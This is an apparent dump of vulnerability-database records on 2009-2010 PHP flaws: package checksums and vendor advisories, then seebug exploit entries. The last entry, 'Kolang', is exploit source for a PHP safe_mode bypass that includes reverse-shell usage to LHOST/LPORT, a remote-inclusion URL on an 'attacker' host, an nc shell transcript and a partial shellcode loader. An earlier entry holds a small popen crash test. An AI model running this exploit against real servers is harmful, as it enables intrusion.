2009.1/x86_64/php-readline-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 77eac443f9815c6d0ef8e8fd568db4ee 2009.1/x86_64/php-recode-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 856bf3e9057af8bde882438ad1eee118 2009.1/x86_64/php-session-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 69cca73c0beddcb52e446d63a73d21e5 2009.1/x86_64/php-shmop-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 5d8581b3f8e53b8f52da2da0a73884cc 2009.1/x86_64/php-snmp-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 29ea7403270f17ec5bd30b9112205411 2009.1/x86_64/php-soap-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n e93c577279cb9cb056bba35e2b186bff 2009.1/x86_64/php-sockets-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 3bc830edc296be56698d4f13a3ff88e8 2009.1/x86_64/php-sqlite-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n e121a968ed9ef0973768b780f76f8d32 2009.1/x86_64/php-sybase-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n fb49c489aee9191893c0938ae9cb8e92 2009.1/x86_64/php-sysvmsg-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n e9aaeeed090a397dc7c003987429de0b 2009.1/x86_64/php-sysvsem-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 01f1e4c93d7e6382144f20bb59b2ef70 2009.1/x86_64/php-sysvshm-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 6267e5a98a49282341ea3dc179924d5e 2009.1/x86_64/php-tidy-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 92acb690eb21aa10409c84ff68eef490 2009.1/x86_64/php-tokenizer-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 4525cab46df252d7599cefa4627ab0c3 2009.1/x86_64/php-wddx-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 3ba5b1bec63ba7291223826530f33e7b 2009.1/x86_64/php-xml-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 22731636ce30cf7913ca761d46730159 2009.1/x86_64/php-xmlreader-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n d247b289eb6f6e88cfe17c2e7013a569 2009.1/x86_64/php-xmlrpc-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 0a00ebcb1987da46f68dc21dc007cad9 2009.1/x86_64/php-xmlwriter-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n fad982207327d8e636c6f691e842755b 2009.1/x86_64/php-xsl-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n bbda8f6739f36ba02e858840c5070a75 2009.1/x86_64/php-zip-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n d40567ee2da7a95b876bff21b748ca3e 2009.1/x86_64/php-zlib-5.2.9-6.2mdv2009.1.x86_64.rpm \r\n 14ce077421185006aca3c756375f008b 2009.1/SRPMS/php-5.2.9-6.2mdv2009.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFKvPNGmqjQ0CJFipgRAjbJAJ0SV+VlWt41Ne7Zk9zYP2gR9bLkOgCggoJr\r\nFZ9YGT2ZplNudvKNgYo0c0k=\r\n=eYIU\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-09-28T00:00:00", "published": "2009-09-28T00:00:00", "id": "SECURITYVULNS:DOC:22520", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22520", "title": "[ MDVSA-2009:248 ] php", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-3559", "CVE-2009-3557"], "description": "safe_mode bypass via different functions.", "edition": 1, "modified": "2009-12-04T00:00:00", "published": "2009-12-04T00:00:00", "id": "SECURITYVULNS:VULN:10417", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10417", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3546", "CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "Certificates spoofing, memory corruptions on images parsing, information leakage.", "edition": 1, "modified": "2009-10-20T00:00:00", "published": "2009-10-20T00:00:00", "id": "SECURITYVULNS:VULN:10269", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10269", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4143", "CVE-2009-3557"], "description": "safe_mode bypass, open_basedir bypass, memory corruption.", "edition": 1, "modified": "2010-01-08T00:00:00", "published": "2010-01-08T00:00:00", "id": "SECURITYVULNS:VULN:10505", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10505", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "description": "\nPHP developers reports:\n\nThis release focuses on improving the stability of the\n\t PHP 5.2.x branch with over 60 bug fixes, some of which\n\t are security related. All users of PHP 5.2 are encouraged\n\t to upgrade to this release.\nSecurity Enhancements and Fixes in PHP 5.2.12:\n\nFixed a safe_mode bypass in tempnam() identified by\n\t Grzegorz Stachowiak. (CVE-2009-3557, Rasmus)\nFixed a open_basedir bypass in posix_mkfifo()\n\t identified by Grzegorz Stachowiak. (CVE-2009-3558, Rasmus)\nAdded \"max_file_uploads\" INI directive, which can\n\t be set to limit the number of file uploads per-request\n\t to 20 by default, to prevent possible DOS via temporary\n\t file exhaustion, identified by Bogdan Calin.\n\t (CVE-2009-4017, Ilia)\nAdded protection for $_SESSION from interrupt\n\t corruption and improved \"session.save_path\" check,\n\t identified by Stefan Esser. (CVE-2009-4143, Stas)\nFixed bug #49785 (insufficient input string\n\t validation of htmlspecialchars()). (CVE-2009-4142,\n\t Moriyoshi, hello at iwamot dot com)\n\n\n", "edition": 4, "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "id": "39A25A63-EB5C-11DE-B650-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/39a25a63-eb5c-11de-b650-00215c6a37bb.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "\nVendor reports\n\nSecurity Enhancements and Fixes in PHP 5.2.11:\n\t Fixed certificate validation inside\n\t php_openssl_apply_verification_policy.\n\t Fixed sanity check for the color index in imagecolortransparent.\n\t Added missing sanity checks around exif processing.\n\t Fixed bug 44683 popen crashes when an invalid mode is passed.\n\n", "edition": 4, "modified": "2009-09-17T00:00:00", "published": "2009-09-17T00:00:00", "id": "437A68CF-B752-11DE-B6EB-00E0815B8DA8", "href": "https://vuxml.freebsd.org/freebsd/437a68cf-b752-11de-b6eb-00e0815b8da8.html", "title": "php5 -- Multiple security issues", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:25", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3557", "CVE-2009-3558", "CVE-2009-4017", "CVE-2009-4142", "CVE-2009-4143"], "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\nand -current to fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4142\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4143\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/php-5.2.12-i486-1_slack13.0.txz: Upgraded.\n This fixes many bugs, including a few security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4142\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4143\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0 (extra):\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.12-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.2.12-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.2.12-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.2.12-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/php-5.2.12-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/php-5.2.12-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.2.12-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.2.12-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 11.0 package (extra):\n94663ecdfaf88a63d733196354cdaae3 php-5.2.12-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n72797884f949a852b2a422bcc15beb8a php-5.2.12-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n5ade2e37ba71a2b9f621d9b77c7b873a php-5.2.12-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nb97340f6cc93d9ef0adbc4ce3bc64639 php-5.2.12-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nea29f8d84a8cf9126a2262cc780a30a5 php-5.2.12-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\na5429361ec7f715435a158c8d5c242e2 php-5.2.12-x86_64-1_slack13.0.txz\n\nSlackware -current package:\n53820c806115e882d2863d5c5b2ab2a6 php-5.2.12-i486-1.txz\n\nSlackware x86_64 -current package:\ne76bd2540de69a09166149bfa56da12c php-5.2.12-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.2.12-i486-1_slack13.0.txz", "modified": "2010-01-25T05:20:07", "published": "2010-01-25T05:20:07", "id": "SSA-2010-024-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.490297", "type": "slackware", "title": "[slackware-security] php", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T07:36:53", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "New php packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/php-5.2.11-i486-1_slack13.0.txz:\n This release fixes some possible security issues, all of which have\n &quot;unknown impact and attack vectors&quot;.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.2.11-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.2.11-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.2.11-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/php-5.2.11-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/php-5.2.11-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.2.11-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.2.11-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nbc56d8e0d56197d7b0eaeee791e20307 php-5.2.11-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n67fa37b8c23b303c3ecf3294183ed0ae php-5.2.11-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n6e44a700f0ef0a57eecb37a033d3cd1f php-5.2.11-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\na766796b71a41b6cd783ffbf2b237a80 php-5.2.11-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nd7de1dc05f88c8b3b7cff7cec45f18de php-5.2.11-x86_64-1_slack13.0.txz\n\nSlackware -current package:\nfb6e9b0a3d8c4a3a08eea2bbe31a9c08 php-5.2.11-i486-1.txz\n\nSlackware x86_64 -current package:\nbe11f0990d29843d1f4480a75eaa4d3e php-5.2.11-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.2.11-i486-1_slack13.0.txz", "modified": "2009-10-04T00:01:56", "published": "2009-10-04T00:01:56", "id": "SSA-2009-276-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.455164", "type": "slackware", "title": "php", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:10", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2687", "CVE-2009-3291", "CVE-2009-3292", "CVE-2009-3546", "CVE-2009-4017", "CVE-2009-4142"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nMultiple missing input sanitization flaws were discovered in PHP's exif\nextension. A specially-crafted image file could cause the PHP interpreter\nto crash or, possibly, disclose portions of its memory when a PHP script\ntried to extract Exchangeable image file format (Exif) metadata from the\nimage file. (CVE-2009-2687, CVE-2009-3292)\n\nA missing input sanitization flaw, leading to a buffer overflow, was\ndiscovered in PHP's gd library. A specially-crafted GD image file could\ncause the PHP interpreter to crash or, possibly, execute arbitrary code\nwhen opened. (CVE-2009-3546)\n\nIt was discovered that PHP did not limit the maximum number of files that\ncan be uploaded in one request. A remote attacker could use this flaw to\ninstigate a denial of service by causing the PHP interpreter to use lots of\nsystem resources dealing with requests containing large amounts of files to\nbe uploaded. This vulnerability depends on file uploads being enabled\n(which it is, in the default PHP configuration). (CVE-2009-4017)\n\nNote: This update introduces a new configuration option, max_file_uploads,\nused for limiting the number of files that can be uploaded in one request.\nBy default, the limit is 20 files per request.\n\nIt was discovered that PHP was affected by the previously published \"null\nprefix attack\", caused by incorrect handling of NUL characters in X.509\ncertificates. If an attacker is able to get a carefully-crafted certificate\nsigned by a trusted Certificate Authority, the attacker could use the\ncertificate during a man-in-the-middle attack and potentially confuse PHP\ninto accepting it by mistake. (CVE-2009-3291)\n\nIt was discovered that PHP's htmlspecialchars() function did not properly\nrecognize partial multi-byte sequences for some multi-byte encodings,\nsending them to output without them being escaped. An attacker could use\nthis flaw to perform a cross-site scripting attack. (CVE-2009-4142)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.", "modified": "2018-05-26T04:26:18", "published": "2010-01-13T05:00:00", "id": "RHSA-2010:0040", "href": "https://access.redhat.com/errata/RHSA-2010:0040", "type": "redhat", "title": "(RHSA-2010:0040) Moderate: php security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:33", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3546", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-3291"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0040\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nMultiple missing input sanitization flaws were discovered in PHP's exif\nextension. A specially-crafted image file could cause the PHP interpreter\nto crash or, possibly, disclose portions of its memory when a PHP script\ntried to extract Exchangeable image file format (Exif) metadata from the\nimage file. (CVE-2009-2687, CVE-2009-3292)\n\nA missing input sanitization flaw, leading to a buffer overflow, was\ndiscovered in PHP's gd library. A specially-crafted GD image file could\ncause the PHP interpreter to crash or, possibly, execute arbitrary code\nwhen opened. (CVE-2009-3546)\n\nIt was discovered that PHP did not limit the maximum number of files that\ncan be uploaded in one request. A remote attacker could use this flaw to\ninstigate a denial of service by causing the PHP interpreter to use lots of\nsystem resources dealing with requests containing large amounts of files to\nbe uploaded. This vulnerability depends on file uploads being enabled\n(which it is, in the default PHP configuration). (CVE-2009-4017)\n\nNote: This update introduces a new configuration option, max_file_uploads,\nused for limiting the number of files that can be uploaded in one request.\nBy default, the limit is 20 files per request.\n\nIt was discovered that PHP was affected by the previously published \"null\nprefix attack\", caused by incorrect handling of NUL characters in X.509\ncertificates. If an attacker is able to get a carefully-crafted certificate\nsigned by a trusted Certificate Authority, the attacker could use the\ncertificate during a man-in-the-middle attack and potentially confuse PHP\ninto accepting it by mistake. (CVE-2009-3291)\n\nIt was discovered that PHP's htmlspecialchars() function did not properly\nrecognize partial multi-byte sequences for some multi-byte encodings,\nsending them to output without them being escaped. An attacker could use\nthis flaw to perform a cross-site scripting attack. (CVE-2009-4142)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028481.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028482.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028499.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028500.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028501.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028502.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pear\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0040.html", "edition": 4, "modified": "2010-01-15T00:11:27", "published": "2010-01-13T22:42:15", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/028481.html", "id": "CESA-2010:0040", "title": "php security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:45", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3546", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-3291"], "description": "[5.1.6-24.5]\n- add security fix for CVE-2009-4142 (#543469)\n[5.1.6-24.4]\n- build fix pdo_mysql on biarch systems (#543469)\n[5.1.6-24.3]\n- add security fixes for CVE-2009-2687, CVE-2009-3291, CVE-2009-3292,\n CVE-2009-3546 CVE-2009-4017 (#541597)\n- add build fix for mysqli on some biarch systems (#543469) ", "edition": 4, "modified": "2010-01-13T00:00:00", "published": "2010-01-13T00:00:00", "id": "ELSA-2010-0040", "href": "http://linux.oracle.com/errata/ELSA-2010-0040.html", "title": "php security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:35:47", "description": "BUGTRAQ ID: 36449\r\nCVE ID: CVE-2009-3291,CVE-2009-3292,CVE-2009-3293,CVE-2009-3294\r\n\r\nPHP\u662f\u5e7f\u6cdb\u4f7f\u7528\u7684\u901a\u7528\u76ee\u7684\u811a\u672c\u8bed\u8a00\uff0c\u7279\u522b\u9002\u5408\u4e8eWeb\u5f00\u53d1\uff0c\u53ef\u5d4c\u5165\u5230HTML\u4e2d\u3002\r\n\r\nPHP\u76845.2.11\u4e4b\u524d\u7248\u672c\u7684\u591a\u4e2a\u51fd\u6570\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n1) PHP\u7684php_openssl_apply_verification_policy\u51fd\u6570\u6ca1\u6709\u6b63\u786e\u7684\u6267\u884c\u8bc1\u4e66\u9a8c\u8bc1\uff0c\u53ef\u80fd\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7\u4f2a\u9020\u7684\u8bc1\u4e66\u6267\u884c\u6b3a\u9a97\u653b\u51fb\u3002\r\n\r\n2) imagecolortransparent\u51fd\u6570\u6ca1\u6709\u6b63\u786e\u7684\u5bf9\u989c\u8272\u7d22\u5f15\u6267\u884c\u8fc7\u6ee4\u68c0\u67e5\u3002\r\n\r\n3) \u5f53\u8fd0\u884c\u5728\u67d0\u4e9bWindows\u64cd\u4f5c\u7cfb\u7edf\u4e0a\u65f6\uff0cTSRM/tsrm_win32.c\u6587\u4ef6\u4e2d\u7684popen API\u51fd\u6570\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4e2d\u7684\u7279\u5236e\u6216er\u5b57\u7b26\u4e32\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\n\nPHP 5.2.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.php.net/releases/5_2_11.php", "published": "2009-09-23T00:00:00", "title": "PHP 5.2.11\u7248\u672c\u4fee\u590d\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3291", "CVE-2009-3292", "CVE-2009-3293", "CVE-2009-3294"], "modified": "2009-09-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12389", "id": "SSV:12389", "sourceData": "\n &lt;?php\r\n$t1 = popen(&quot;echo hello&quot;, &quot;e&quot;);\r\npclose($t1);\r\n$t2 = popen(&quot;echo hello&quot;, &quot;re&quot;);\r\npclose($t2);\r\n$t3 = popen(&quot;echo hello&quot;, &quot;er&quot;);\r\npclose($t3);\r\n?&gt;\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12389"}, {"lastseen": "2017-11-19T18:13:54", "description": "No description provided by source.", "published": "2010-03-06T00:00:00", "title": "Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2010-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19231", "id": "SSV:19231", "sourceData": "\n &lt;?php\r\n/*\r\nKolang (PHP Safe mode bypass)\r\n(IHSteam priv8 for lazy penetration testers)\r\n \r\n(php 4.3.10 - 5.3.0)\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 (12/19/2009)\r\nhttp://www.milw0rm.com/exploits/7393 (12/09/2008)\r\n \r\n1- Kolang can be used directly in file inclusion RFI&amp;LFI vulnerabilities (no upload required)\r\n2- Kolang can execute arbitrary shellcode (just for fans of metasploit )\r\n \r\n~~~~ How to use:)\r\n \r\nfor linux:\r\n kolang.php?os=linux&amp;host=LHOST&amp;port=LPORT\r\n or\r\n kolang.php?os=linux&amp;shell=BASE64_ENCODED_SHELLCODE\r\n \r\nfor freebsd:\r\n kolang.php?os=freebsd&amp;shell=BASE64_ENCODED_SHELLCODE\r\n \r\nfile inclusion :\r\n http://host/vul.php?path=http://attacker/kolang.txt?&amp;os=linux&amp;host=LHOST&amp;port=LPORT\r\n \r\n \r\nhttp://localhost/kolang.php?host=localhost&amp;port=2121\r\nhamid@bugtraq ~ $ nc -vv -l -p 2121\r\nlistening on [any] 2121 ...\r\nconnect to [127.0.0.1] from bugtraq [127.0.0.1] 40526\r\nid\r\nuid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)\r\n \r\n \r\nHamid Ebadi\r\nhttp://www.bugtraq.ir\r\ncontact : ebadi~bugtraq~ir\r\n \r\nKolang means pickaxe (the idea came from amnafzar naming convention)\r\n(Separ, Sarand, Alak, Skort)\r\n*/\r\n \r\n \r\n$port= intval($_REQUEST['port']);\r\n$host= $_REQUEST['host'];\r\n$os= $_REQUEST['os'];\r\n \r\n/*\r\n \r\n \r\n//compile : cc -o shellcode.so -fPIC -shared shellcode.c\r\n//\r\n//&lt;?php\r\n//$data=file_get_contents('shellcode.so');\r\n//file_put_contents('shellcode_base64.txt',$data);\r\n//?&gt;\r\n \r\n \r\n \r\n \r\n// &quot;shellcode loader&quot; : load and execute arbitrary shellcode from a file\r\n// Hamid Ebadi\r\n#define O_RDONLY 00 ; fcntl.h\r\n#define SHELLCODE_MAX_SIZE 1024\r\n// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\n#define SHELLCODE_FILENAME &quot;/tmp/.X11-IHSTEAM&quot;\r\n \r\nvoid getuid()\r\n{\r\n unsetenv(&quot;LD_PRELOAD&quot;); //not really necessary, we can remove it\r\n int fd;\r\n char shellcode[SHELLCODE_MAX_SIZE];\r\n char filename[]=SHELLCODE_FILENAME ;\r\n // we can also pass the shellcode in program's arguments\r\n if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) &lt; 0) 